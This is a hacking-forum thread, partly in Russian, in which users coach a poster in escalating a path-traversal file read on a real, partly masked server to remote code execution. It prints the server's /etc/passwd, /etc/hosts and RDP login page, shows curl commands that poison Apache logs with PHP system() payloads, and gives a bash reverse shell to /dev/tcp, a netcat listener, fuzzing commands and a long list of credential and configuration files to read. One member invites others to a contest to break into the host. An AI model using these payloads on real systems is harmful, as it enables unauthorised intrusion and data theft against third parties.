LFI to RCE

[Sec13B]

I need someone to make me to understand this :

we have this LFI :
https://ip:port/downloadfile.php?file=../../../../../../../../../../etc/passwd

how i can "make" rce:
I will add this 10 " ../ " " ../../../../../../../../../../'" after downloadfile.php?file= "
downloadfile.php?file=../../../../../../../../../../var/log/apache2/access.log&c=id

if i will do :
medium.com/@omarwhadidi9/10-ways-to-get-rce-from-lfi-f2bb696b67f6


github.com/RoqueNight/LFI---RCE-Cheat-Sheet
index.php?file=../../../../../../../var/log/auth.log&c=id


/downloadfile.php?file=../../../../../../../var/log/auth.log&c=id

none of them work

 

[FantasticExploits]

downloadfile.php sounds like u can read file not include.

 

[Sec13B]

downloadfile.php

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
casper:x:1000:1000:casper,,,:/home/casper:/bin/bash
Debian-exim:x:105:112::/var/spool/exim4:/bin/false
artem:x:1001:1001::/home/artem:/bin/bash
wsgate:x:999:999::/var/run/wsgate:/bin/false
zabbix:x:106:114::/var/lib/zabbix/:/bin/false
ntp:x:107:115::/home/ntp:/bin/false
statd:x:108:65534::/var/lib/nfs:/bin/false
techlogin:x:1002:1002::/home/techlogin:
skun:x:1003:1003::/home/skurkin:

 

[FantasticExploits]

downloadfile.php

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
casper:x:1000:1000:casper,,,:/home/casper:/bin/bash
Debian-exim:x:105:112::/var/spool/exim4:/bin/false
artem:x:1001:1001::/home/artem:/bin/bash
wsgate:x:999:999::/var/run/wsgate:/bin/false
zabbix:x:106:114::/var/lib/zabbix/:/bin/false
ntp:x:107:115::/home/ntp:/bin/false
statd:x:108:65534::/var/lib/nfs:/bin/false
techlogin:x:1002:1002::/home/techlogin:
skun:x:1003:1003::/home/skurkin:

Yes, u see source, now try get source of downloadfile.php

 

[xargs]

downloadfile.php?file=../../../../../../../../../../var/log/apache2/access.log&c=id

before include access.log you need to send req to server with user-agent "<?php system($_GET['c']);?>"

 

[Sec13B]

can you show me a example ?

 

[FantasticExploits]

can you show me a example ?

curl https://www.whatismybrowser.com/detect/what-is-my-user-agent/ -A "lol" | grep detected_value

<div class="value" id="de
tected_value">lol</div>

example:

curl http://target -A "<?php system($_GET['c']);?>"

 

[xargs]

Send req to server with User-Agent: <?php var_dump('hacked');>

GET /test-include/?file=/var/log/apache2/access.log HTTP/1.1
Host: 127.0.0.1
User-Agent: <?php var_dump('hacked');>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

our test php script:

<?php
include($_GET['file']);

after req read access.log:

└─# cat /var/log/apache2/access.log   
127.0.0.1 - - [17/Oct/2024:19:11:04 +0200] "GET /test-include/?file=/var/log/apache2/access.log HTTP/1.1" 200 203 "-" "<?php var_dump('hacked');>"

so if we include /var/log/apache2/access.log with PHP code it execute. BUT by default permissions: 750 and user www-data (web-server user) CAN'T access to folder with access.log
drwxr-x--- 2 root adm 4.0K Aug 17 00:40 apache2

AND even if we have read-perm on /var/log/apache2 folder we may not be allowed by the php configuration:

[Thu Oct 17 19:18:07.871026 2024] [php:warn] [pid 71479:tid 71479] [client 127.0.0.1:44236] PHP Warning:  include(): Failed opening '/var/log/apache2/access.log' for inclusion (include_path='.:/usr/share/php') in /var/www/html/test-include/index.php on line 2

 

[Sec13B]

Like this ?

curl "https://217.xxx.xxx.75:4430/downloadfile.php?file=../../../../../../../../../../var/log/apache2/access.log&" -H "User-Agent: <?php system($_GET['c']);?>"

 

[xargs]

curl "https://217.xxx.xxx.75:4430/downloadfile.php?file=../../../../../../../../../../var/log/apache2/access.log&" -H "User-Agent: <?php system($_GET['c']);?>"

1st req poison access.log:

curl "https://217.xxx.xxx.75:4430/" -H "User-Agent: <?php system($_GET['c']);?>"

2nd req exec php code:

curl "https://217.xxx.xxx.75:4430/downloadfile.php?file=../../../../../../../../../../var/log/apache2/access.log&c=whoami"

no need to spam User-Agent with poison code every time

 

[Sec13B]

sh: bad math expression: operand expected at `'c''


-H "User-Agent: <?php var_dump('hacked');>"
curl: (60) server verification failed: certificate has expired. (CAfile: /etc/ssl/certs/ca-certificates.crt CRLfile: none)
More details here: https://curl.se/docs/sslcerts.html

curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the webpage mentioned above.

 

[Эрмано]

От LFI до RCE можно раскрутиться посредством использования php-фильтров и с помощью отправления логов(Apache, SSH, FTP etc.), хорошая утилита - https://github.com/0bfxgh0st/lfi2rce, дополнительная информация - https://book.hacktricks.xyz/pentesting-web/file-inclusion

 

[Sec13B]

От LFI до RCE можно раскрутиться посредством использования php-фильтров и с помощью отправления логов(Apache, SSH, FTP etc.), хорошая утилита - https://github.com/0bfxgh0st/lfi2rce, дополнительная информация - https://book.hacktricks.xyz/pentesting-web/file-inclusion

i read them , and more examples

 

[FantasticExploits]

sh: bad math expression: operand expected at `'c''


-H "User-Agent: <?php var_dump('hacked');>"
curl: (60) server verification failed: certificate has expired. (CAfile: /etc/ssl/certs/ca-certificates.crt CRLfile: none)
More details here: https://curl.se/docs/sslcerts.html

curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the webpage mentioned above.


Посмотреть вложение 96782

Skip verification​

Tell curl to not verify the peer with-k/--insecure.

ну и тем временем методом ручного перебора линков, нашел твой хост. Плохо ру хостеров ебать!1 Пытатся в LFI там где читалка(arbitrary file read), еще хуже.

view-source:https://217.174.xxx.75:4430/downloa.../../../../../../../var/log/apache2/access.log

<!DOCTYPE html>
<html>
    <head>
    <link href='https://fonts.googleapis.com/css?family=Quicksand' rel='stylesheet' type='text/css'>
        <meta charset="utf-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
        <title>RDP WebConnect: offline</title>
        <meta name="robots" content="nofollow" />
        <meta name="description" content="A HTML5 based RDP client">
        <meta name="viewport" content="width=device-width height=device-height user-scalable=no">
        <meta name="cursor-event-mode" content="native">
        <meta name="touch-event-mode" content="pure-with-mouse-conversion">
        <link rel="stylesheet" href="css/style.css">
        <link rel="stylesheet" href="css/vkb.css">
        <script src="js/modernizr.js"></script>
        <script src="js/mootools.js"></script>
        <script src="js/simpletabs.js"></script>
        <script src="js/wsgate.js"></script>
        <script src="js/vkb.js"></script>
        <!--<script language="javascript" type="text/javascript" src="js/rdpevents.js"></script>-->
        <script language="javascript" type="text/javascript">
            var wsBase = "wss://217.174.104.75:4430/wsgate";
            var RIMtablet = navigator.appVersion && (-1 != navigator.appVersion.indexOf('RIM Tablet'));
            var mhx = 100;
            var mhy = 100;
            var dragX = 0;
            var dragY = 0;
            var inDrag = false;
            var rdp = null;
            var vkbd = null;
 
            function getRequests() {
              var s1 = location.search.substring(1, location.search.length).split('&'),
                r = {}, s2, i;
                for (i = 0; i < s1.length; i += 1) {
                s2 = s1[i].split('=');
                r[decodeURIComponent(s2[0]).toLowerCase()] = decodeURIComponent(s2[1]);
                }
                return r;
            };

               var RequestString = getRequests();

                if(!encodeURIComponent(RequestString['pcb'].trim()).match(/[0-9a-fA-F\-]{8,}/)){           
                   window.location = 'error.html';
                }
            

            var externalConnection = false;

            function RDPGet(uri, title) {
                var wsUri = wsBase + uri;

                rdp = new wsgate.RDP(wsUri, $('screen'), !RIMtablet, RIMtablet, vkbd);

                rdp.addEvent('alert', function(msg) {
                    alert(msg);
                    });
                rdp.addEvent('connected', function() {
                        document.title = title;
                        button = $("rdpconnect");
                        button.removeEvents();
                        window.removeEvent('resize', OnDesktopSize);
                        button.value = 'Disconnect';
                        button.addEvent('click', rdp.Disconnect.bind(rdp));
                        });
                rdp.addEvent('disconnected', function() {
                        showDialog(false);
                        window.close();                                           
                        button = $("rdpconnect");
                        button.removeEvents();
                        button.value = 'Connect';
                        button.addEvent('click', RDPrun);
                        OnDesktopSize();
                        window.addEvent('resize', OnDesktopSize);
                        });
                rdp.addEvent('mouserelease', ResetRdpMouseFlags);
                rdp.addEvent('touch2', function() {
                    ShowMouseHelper($('mousehelper').hasClass('invisible'));
                });

                rdp.addEvent('touch3', function() {
                    vkbd.toggle();
                });

                showDialog(false);
                rdp.Run();
            }

            function RDPrun() {

                if(!encodeURIComponent($('rdppcb').value.trim()).match(/[0-9a-fA-F\-]{8,}/)){           
                    return false;
                }

                var wsUri = wsBase
                    + '?host=' + encodeURIComponent($('rdphost').value.trim())
                    + '&pcb='  + encodeURIComponent($('rdppcb').value.trim())
                    + '&user=' + encodeURIComponent($('rdpuser').value.trim())
                    + '&pass=' + encodeURIComponent($('rdppass').value.toBase64())
                    + '&perf=' + $('perf').value.trim()
                    + '&fntlm=' + $('fntlm').value.trim()
                    + '&nowallp=' + ($('nowallp').checked ? '1' : '0')
                    + '&nowdrag=' + ($('nowdrag').checked ? '1' : '0')
                    + '&nomani=' + ($('nomani').checked ? '1' : '0')
                    + '&notheme=' + ($('notheme').checked ? '1' : '0')
                    + '&nonla=' + ($('nonla').checked ? '1' : '0')
                    + '&notls=' + ($('notls').checked ? '1' : '0')
                    + '&dtsize=' + $('screen').width + 'x' + $('screen').height
                    ;
                $('dvLoading').setStyles({'visibility':'visible'});
                        

                rdp = new wsgate.RDP(wsUri, $('screen'), !RIMtablet, RIMtablet, vkbd);

                rdp.addEvent('alert', function(msg) {
                        alert(msg);
                        });
                rdp.addEvent('connected', function() {
                        document.title = "FreeRDP WebConnect: connected to " +
                        $('rdphost').value.trim();
                        button = $("rdpconnect");
                        button.removeEvents();
                        window.removeEvent('resize', OnDesktopSize);
                        button.value = 'Disconnect';
                        button.addEvent('click', rdp.Disconnect.bind(rdp));
                        window.addEvent("beforeunload", rdp.Disconnect.bind(rdp));

                        });
                rdp.addEvent('disconnected', function() {
                        showDialog(false);
                        window.close();
                        button = $("rdpconnect");
                        button.removeEvents();
                        button.value = 'Connect';
                        button.addEvent('click', RDPrun);
                        OnDesktopSize();
                        window.addEvent('resize', OnDesktopSize);
                        });
                rdp.addEvent('mouserelease', ResetRdpMouseFlags);
                rdp.addEvent('touch2', function() {
                    ShowMouseHelper($('mousehelper').hasClass('invisible'));
                });
                rdp.addEvent('touch3', function() {
                    vkbd.toggle();
                });
                rdp.addEvent('touch4', function() {
                    if (confirm('Точно отключиться?')) {
                        rdp.Disconnect();
                    }
                });

                showDialog(false);
                rdp.Run();
            }

            function SetRdpMouseFlags() {
                var mf = {
                    'r': $('rclick').checked,
                    'm': $('mclick').checked,
                    'a': $('aclick').checked,
                    's': $('sclick').checked,
                    'c': $('cclick').checked,
                };
                rdp.SetArtificialMouseFlags(mf);
            }
            function ResetRdpMouseFlags() {
                $('rclick').checked = false;
                $('mclick').checked = false;
                $('aclick').checked = false;
                $('sclick').checked = false;
                $('cclick').checked = false;
                rdp.SetArtificialMouseFlags(null);
            }
            function ShowMouseHelper(show) {
                var mh = $('mousehelper');
                inDrag = false;
                if (show) {
                    mh.setStyles({'position':'absolute','top':mhy,'left':mhx,'z-index':999});
                    mh.addEvent('mousedown',DragStart);
                    $('rclick').addEvent('change', SetRdpMouseFlags);
                    $('mclick').addEvent('change', SetRdpMouseFlags);
                    $('aclick').addEvent('change', SetRdpMouseFlags);
                    $('sclick').addEvent('change', SetRdpMouseFlags);
                    $('cclick').addEvent('change', SetRdpMouseFlags);
                    mh.removeClass('invisible');
                } else {
                    mh.removeEvents();
                    mh.addClass('invisible');
                    $('rclick').removeEvents();
                    $('mclick').removeEvents();
                    $('aclick').removeEvents();
                    $('sclick').removeEvents();
                    $('cclick').removeEvents();
                }
            }

            function OnDesktopSize() {
               ResizeCanvas($('dtsize').value);
               DrawLogo();
            }

            function DragStart(evt) {
                var mh = $('mousehelper');
                if (!mh.hasClass('invisible')) {
                    inDrag = true;
                    dragX = evt.page.x;
                    dragY = evt.page.y;
                    window.addEvent('mouseup',DragEnd);
                    window.addEvent('touchmove',DragMove);
                }
            }
            function DragEnd(evt) {
                inDrag = false;
                var mh = $('mousehelper');
                window.removeEvent('touchmove',DragMove);
                window.removeEvent('mouseup',DragEnd);
            }
            function DragMove(evt) {
                if (inDrag) {
                    var dx = evt.page.x - dragX;
                    var dy = evt.page.y - dragY;
                    dragX = evt.page.x;
                    dragY = evt.page.y;
                    var mh = $('mousehelper');
                    if (!mh.hasClass('invisible')) {
                        mhx += dx;
                        mhy += dy;
                        mh.setStyles({'top':mhy,'left':mhx});
                    }
                }
            }

            function DrawLogo() {
                    var logo = new Element('img', {'src': 'empty_on_purpose'});
                    logo.addEvent('load', function() {
                var scaleWCoeficient = 0.5;
                var scaleHCoeficient = 0.5;
                            var iw = this.width * scaleWCoeficient;
                            var ih = this.height * scaleHCoeficient;
                            var scale = ($('screen').height - 20) / ih;
                            $('screen').getContext('2d').drawImage(this, 10, 10, Math.round(iw * scale), Math.round(ih * scale));
                    }.bind(logo));
            }

            function ResizeCanvas(sz) {
                var w, h;
                if (sz == 'auto') {
                    w = window.getCoordinates().width;
                    h = window.getCoordinates().height;
                    if (RIMtablet) {
                        // Toplevel bar not removable
                        h -= 31;
                    }
                    if (w % 2) {
                        w -= 1;
                    }
                } else {
                    var sza = sz.split('x');
                    var w = sza[0];
                    var h = sza[1];
                }
                $('screen').width = w-50;
                $('screen').height = h-50;
                $('screen').style["margin"] = "0 auto";
            }

        var sendDisconnect = function() {
                if (confirm('Точно отключиться?')) {
                    $('extracommands').setStyles({'visibility':'hidden'});
                    rdp.Disconnect();
                }
           }

            var sendCtrlAltDel = function() { rdp.SendKey(1); }

            function showDialog(show) {
                if (show) {
                    ShowMouseHelper(false);
                    var dlg = $('maindialog');
                    var x = Math.round((window.getCoordinates().width - dlg.getCoordinates().width) / 2) + 'px';
                    var y = Math.round((window.getCoordinates().height - dlg.getCoordinates().height) / 2) + 'px';
                    $('extracommands').setStyles(
                    {
                        'visibility':'hidden'
                    });
                    $('dvLoading').setStyles(
                    {
                        'visibility':'hidden'
                    });
                    DrawLogo();
                    dlg.setStyles({
                            'position': 'absolute',
                            'top': y,
                            'left': x,
                            'z-index': 999
                            }).removeClass('invisible');
                } else {
                    $('maindialog').addClass('invisible');
                    $('extracommands').setStyles(
                    {
                        'visibility':'visible'
                    });
                    $('ctrlaltdelete').addEvent('click', sendCtrlAltDel);
                    $('disconnect').addEvent('click', sendDisconnect);
                }
            }

            window.addEventListener("beforeunload", function() {
                if ($('maindialog').hasClass('invisible')){
                    var ans = confirm("Точно отключиться?");
                    if (ans) {
                        rdp.Disconnect();
                    }
                }
            }, false);

            window.addEvent('domready', function() {

                    var querystring = window.location.href.slice(window.location.href.indexOf('?'))

                    $('dtsize').addEvent('change', OnDesktopSize);
                    var tabs = new SimpleTabs('rdpdialog',{selector:'h4'});
                    OnDesktopSize();
                    if (RIMtablet) {
                        // Set default performance flags to modem
                        $('perf').value = '2';
                    }
                    window.addEvent('resize', OnDesktopSize);
                    // Special handling of webkit nightly builds
                    var webkitOK = false;
                    var wkVA = RegExp("( AppleWebKit/)([^ ]+)").exec(navigator.userAgent);
                    if (wkVA && (wkVA.length > 2)) {
                        if (wkVA[2].indexOf('+') != -1) {
                            webkitOK = true;
                        }
                    }
                    var wsOK = RIMtablet || webkitOK ||
                        (Browser.firefox && (Browser.version >= 11.0)) ||
                        (Browser.chrome && (Browser.version >= 17)) ||
                        (Browser.safari && (Browser.version >= 6)) ||
                        (Browser.ie && (Browser.version >= 10.0));
                    if(externalConnection == true)
                    {
                        RDPrun();
                        vkbd = new wsgate.vkbd({
                            version:false,
                            sizeswitch:false,
                            numpadtoggle:false
                        });
                    }
                    if (wsOK) {
                        if(querystring.length > 2)
                        {
                            showDialog(false);
                            var urlParams;
                            (window.onpopstate = function () {
                                var match,
                                    pl     = /\+/g,  // Regex for replacing addition symbol with a space
                                    search = /([^&=]+)=?([^&]*)/g,
                                    decode = function (s) { return decodeURIComponent(s.replace(pl, " ")); },
                                    query  = window.location.search.substring(1);

                                urlParams = {};
                                while (match = search.exec(query))
                                   urlParams[decode(match[1])] = decode(match[2]);
                            })();
                            RDPGet(querystring, urlParams["title"]);
                        }
                        else
                        {
                            $('rdpconnect').addEvent('click', RDPrun);
                            showDialog(true);
                        }
                        vkbd = new wsgate.vkbd({
                            version:false,
                            sizeswitch:false,
                            numpadtoggle:false
                        });
                    } else {
                        alert('Sorry!\nYour Browser (' + Browser.name + ' ' + Browser.version
                                + ') does not yet\nprovide the required HTML5 features '
                                + 'for this application.\n');
                    }
            });
        </script>
    </head>
    <body id="wrapper">
        <div id="extracommands" style="height:28px; background-color:#f1f1f1; padding-left:25px; cursor:default; visibility:hidden;">
            Send keys:
            <ul>

                <li id="ctrlaltdelete">
                    Ctrl+Alt+Delete
                </li>

            </ul>
            <button id="disconnect" type="button" style="float:right; margin-right:40px; margin-top:2px">Отключиться</button>
        </div>
        <canvas id="screen" width="5%" height="5%">
        <p class="error">Sorry, It looks as though your browser does not support the canvas tag.</p>
        </canvas>
        <div id="dvLoading" style="position:fixed; left:45%; top:45%; visibility:hidden;"><img src="images/loading.gif"></div>
        <noscript><p class="error">Please enable JavaScript.</p></noscript>
        <table width="400px" id="maindialog" class="invisible">
        <tr><td>
        <div style="margin-left:auto; margin-right:auto; width:60%; position:relative;">
        <a href="https://www.cloudbase.it">
        <img src='https://cloudbase.it/wp-content/uploads/2012/10/CBSL_web_logo3.png' style="margin-left:auto; margin-right:auto;">
        </a></div></img>
            </td></tr>
            <tr>
                <td>
                    <div id="rdpdialog" class="dialog">
                        <h4 title="Main connection settings">General</h4>
                        <div>
                            <form onkeypress="if (event.keyCode == 13) { document.getElementById('rdpconnect').focus();document.getElementById('rdpconnect').click(); return event.preventDevault();}">
                                <fieldset>
                                    <legend>Session parameters</legend>
                                    <table>
                                        <tr>
                                            <td class="key"><label for="pcb">PCB (vmID):</label></td>       
                                            <td><input id="rdppcb" type="text" name="pcb" value="" /></td>
                                        </tr>

                                        <tr>
                                            <td class="key"><label for="host">Hostname:</label></td>
                                            <td><input id="rdphost" type="text" name="host" value="" /></td>
                                        </tr>
                                        <tr>
                                            <td class="key"><label for="port">Port:</label></td>
                                            <td><select id="port" name="port" >
                                                <option value="auto" >3389</option>
                                                <option >2179</option>
                                            </select>
                                        </tr>
                                        <tr>
                                            <td class="key"><label for="user">User:</label></td>
                                            <td><input id="rdpuser" type="text" name="user" value=""  /></td>
                                        </tr>
                                        <tr>
                                            <td class="key"><label for="pass">Password:</label></td>
                                            <td><input id="rdppass" type="password" name="pass" value="" autocomplete="off"  /></td>
                                        </tr>
                                        <tr>
                                            <td class="key"><label for="dtsize">Desktop size:</label></td>
                                            <td>
                                                <select id="dtsize" name="dtsize">
                                                    <option>640x480</option>
                                                    <option>800x600</option>
                                                    <option>1024x768</option>
                                                    <option>1280x960</option>
                                                    <option>1280x1024</option>
                                                    <option value="auto" selected>Available Area</option>
                                                </select>
                                            </td>
                                        </tr>
                                        <tr>
                                            <td class="buttons" colspan="2"><input id="rdpconnect" type="button" value="Connect" /></td>
                                        </tr>
                                    </table>
                                </fieldset>
                        
                                    <input type="hidden" id="perf" name="perf" value="0"  \>
                                    <input id="nowallp" name="nowallp" type="hidden" value="0"/>
                        
                                        <input id="nowdrag" name="nowdrag" type="hidden" value="0" />
                                        <input id="nomani" name="nomani" type="hidden" value="0" />
                                        <input id="notheme" name="notheme" type="hidden" value="0" />
                                        <input id="nonla" name="nonla" type="hidden" value="0" />
                                        <input id="notls" name="notls" type="hidden" value="0" />
                                        <input id="fntlm" name="fntlm" value="0" type="hidden" />

                    
                            </form>
                        </div>

                    
                    </div>
                </td>
            </tr>
        </table>
        <table width="240px" id="mousehelper" class="invisible">
            <tr>
                <td>
                    <div id="mousedialog" class="dialog">
                        <form>
                            <fieldset>
                                <legend>Click properties</legend>
                                <table>
                                    <tr>
                                        <td class="key"><label class="big" for="rclick">Right</label></td>
                                        <td><input id="rclick" name="rclick" type="checkbox" /></td>
                                    </tr>
                                    <tr>
                                        <td class="key"><label class="big" for="mclick">Middle</label></td>
                                        <td><input id="mclick" name="mclick" type="checkbox" /></td>
                                    </tr>
                                    <tr>
                                        <td class="key"><label class="big" for="aclick">Alt</label></td>
                                        <td><input id="aclick" name="aclick" type="checkbox" /></td>
                                    </tr>
                                    <tr>
                                        <td class="key"><label class="big" for="sclick">Shift</label></td>
                                        <td><input id="sclick" name="sclick" type="checkbox" /></td>
                                    </tr>
                                    <tr>
                                        <td class="key"><label class="big" for="cclick">Control</label></td>
                                        <td><input id="cclick" name="cclick" type="checkbox" /></td>
                                    </tr>
                                </table>
                            </fieldset>
                        </form>
                    </div>
                </td>
            </tr>
        </table>
    </body>
</html>

view-source:https://217.174.xxx.75:4430/downloadfile.php?file=../../../../../../../../../../etc/hosts

127.0.0.1    localhost
192.168.133.224    html5rdp.estt.ru    html5rdp

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

 

[the hand]

попробуй с Burp Suite

 

[Sec13B]

Skip verification​

Tell curl to not verify the peer with-k/--insecure.

ну и тем временем методом ручного перебора линков, нашел твой хост. Плохо ру хостеров ебать!1 Пытатся в LFI там где читалка(arbitrary file read), еще хуже.

Hidden content

yes.
i didnt show the ip

 

[xargs]

Плохо ру хостеров ебать!

mp_friendlyfire 1

Тачка настолько старая (убунта 14) что даже environ читается:
GET /downloadfile.php?file=../../../../../../../../proc/self/environ HTTP/1.1

 

[xargs]

конкурс на похек считается открытым! победителю плюс адин в репу

 

[Sec13B]

uploaded 2 files, which I use for sql, but i still dont understand exactly how to do rce.

urlencode
"bash -c 'bash -i >& /dev/tcp/ip/12345>&1'"
nc -lnvp 12345
python3 -m http.server 12346

I just want to know how i need to do to get shell.



github.com/ffuf/ffuf
raw.githubusercontent.com/xmendez/wfuzz/refs/heads/master/wordlist/vulns/dirTraversal-nix.txt
fuff -w linux_wordlist.txt -u "https://217.174.xxx.75:4430/downloadfile.php?file=../../../../../../../../../../FUZZ" -e -c
fuff -w windows_wordlist.txt -u "https://217.174.xxx.75:4430/downloadfile.php?file=../../../../../../../../../../FUZZ" -e -c


linux_wordlist.txt

/etc/passwd
/etc/shadow
/etc/aliases
/etc/anacrontab
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/at.allow
/etc/at.deny
/etc/bashrc
/etc/bootptab
/etc/chrootUsers
/etc/chttp.conf
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/cups/cupsd.conf
/etc/exports
/etc/fstab
/etc/ftpaccess
/etc/ftpchroot
/etc/ftphosts
/etc/groups
/etc/grub.conf
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/httpd/access.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/php.ini
/etc/httpd/srm.conf
/etc/inetd.conf
/etc/inittab
/etc/issue
/etc/lighttpd.conf
/etc/lilo.conf
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/lsb-release
/etc/motd
/etc/modules.conf
/etc/mtab
/etc/my.cnf
/etc/my.conf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/npasswd
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/printcap
/etc/profile
/etc/proftp.conf
/etc/proftpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/putreftpd.pdb
/etc/redhat-release
/etc/resolv.conf
/etc/samba/smb.conf
/etc/snmpd.conf
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/sysconfig/network
/etc/syslog.conf
/etc/termcap
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/logs/pure-ftpd.log
/logs/security_debug_log
/logs/security_log
/opt/lampp/etc/httpd.conf
/opt/xampp/etc/php.ini
/proc/cpuinfo
/proc/filesystems
/proc/interrupts
/proc/ioports
/proc/meminfo
/proc/modules
/proc/mounts
/proc/sched_debug
/proc/stat
/proc/swaps
/proc/version
/proc/self/net/arp
/root/anaconda-ks.cfg
/usr/etc/pure-ftpd.conf
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/apache/conf/modsec.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/audit_log
/usr/local/apache/error_log
/usr/local/apache/error.log
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.ini
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdn
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/httpd_log
/usr/local/Zend/etc/php.ini
/usr/sbin/pure-config.pl
/var/adm/log/xferlog
/var/apache2/config.inc
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/php.ini
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth.log
/var/log/boot
/var/htmp
/var/log/chttp.log
/var/log/cups/error.log
/var/log/daemon.log
/var/log/debug
